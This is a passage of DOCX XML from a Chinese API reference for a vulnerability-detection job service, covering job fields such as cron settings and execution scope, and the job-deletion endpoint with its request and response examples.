          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58BE3FA1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="159BD65D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>公司id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="21FA1716" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15B3E000" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uuid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30A50B62" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46B28EF6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B233D79" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uuid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="128401FD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12546F73" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C445B0E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7565FE7A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>255)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64E078B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="52DBD046" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D4D03E6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E9B8936" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FEBC3CA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42C32128" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否启用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6DFA7C50" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55D1F7FA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>createTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="732316E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="243250AB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="394D852A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>创建时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3767A796" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D800405" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>updateTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73271080" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CB0F2CA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B5F059F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>更新时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0F93E624" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E950507" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cronEnabled</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55EEA7B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FA5374E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40476FAC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否定时</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1F212D50" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37F09F96" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25271349" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="671BB088" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C504985" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>任务表达式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0B44AFF4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56D4202A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cronTaskId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22E2DDC0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7461D734" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6889D887" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cronTaskId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="21D6AA73" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="651ECF3F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A019926" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A5D2AE8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4343F9E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6B8A5067" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4355B29A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>realm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49B199F5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D6C27F1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79451D84" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0721018C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="343B7E93" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69738A51" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="108E391E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B31F8C2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行范围名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3F5EC474" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18450DE3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>lastExecuteTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C326F85" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25ED01AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10664B2D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>最后执行时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31A37E71" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="235" w:name="_Toc115166192"/>
      <w:bookmarkStart w:id="236" w:name="漏洞检测作业删除"/>
      <w:bookmarkEnd w:id="234"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>漏洞检测作业删除</w:t>
      </w:r>
      <w:bookmarkEnd w:id="235"/>
    </w:p>
    <w:p w14:paraId="683688E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2E9CD9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>DELETE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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jobId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A43FAA4"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702"/>
        <w:gridCol w:w="760"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="840"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="2BE2A22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CF315D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44996552" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BD0C5A4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="233B1007" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="78F034FD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30738231" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jobId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A566B57" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4060C4C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B697D13" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="322DCE1D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22490049" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>DELETE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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>5c3fe2c77d761b1e0a8b5c2a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="659CAA83" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4646540F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "flag": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13138F94"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630"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1397"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="3BC5EA6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077E938" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="433AFBFC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48E1C917" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18EC4954" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2856C5EA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32BEC89D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C22FC49" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="453560C6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BCE671E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否删除成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="23F35795" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="237" w:name="_Toc115166193"/>
      <w:bookmarkStart w:id="238" w:name="开始作业执行"/>
      <w:bookmarkEnd w:id="236"/>
      <w:r>
        <w:t>开始作业执行</w:t>
      </w:r>
      <w:bookmarkEnd w:id="237"/>
    </w:p>
